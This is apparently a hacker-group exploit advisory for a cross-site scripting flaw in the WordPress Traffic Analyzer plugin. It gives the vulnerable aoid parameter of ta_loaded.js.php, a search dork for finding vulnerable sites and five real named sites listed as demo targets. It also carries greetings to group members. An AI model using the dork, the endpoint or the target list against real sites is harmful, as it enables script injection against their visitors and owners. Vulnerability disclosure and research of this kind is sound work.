WordPress Traffic Analyzer third-party plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
8849e30d2762c019ed41393a39f69eef8ad290bbe9f2061b55bfe6e22bd914e8
################################################################################
#
# Exploit Title : WordPress Trafficanalyzer Plugin XSS Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Beni_Vanda
#
# Home : http://IrIsT.Ir/en/
#
# Software Link : http://wptrafficanalyzer.in
#
# Security Risk : Medium
#
# Version : All Version
#
# Tested on : GNU/Linux (Ubuntu/BT/Fedora) - win7
#
# Dork : inurl:js/ta_loaded.js.php?aoid=
#
################################################################################
#
# Expl0iTs :
#
# http://target/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
#
#
# D3mo :
#
# http://www.nldtrondheim.net/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
# http://brussac.lagalite.net/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
# http://gym-n-kydon.chan.sch.gr/sxoleio/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
# http://www.doe.gov.my/portal/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
# http://valkunas.ftmc.lt/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
#
################################################################################
#
# Greats : Am!r - C0dex - B3HZ4D - TaK.FaNaR - Dead.Zone - 0x0ptim0us - skote_vahshat
#
# black_king - Mr.XHat - m3hdi - F@rid - Dr.Tofan - Dj.TiniVini - (^_^) - sajjad11&13
#
# MR.AN0NYM - Silent - Dr.Koderz - Z3r0 - Mr.Zer0 - Megatron - x3o-1337 - asesino04
#
# Sukhoi Su-37 - Cyber_Injection - Smart_Programmer - IR Anonymous &&
#
# All Members In Www.IrIsT.Ir/forum
#
################################################################################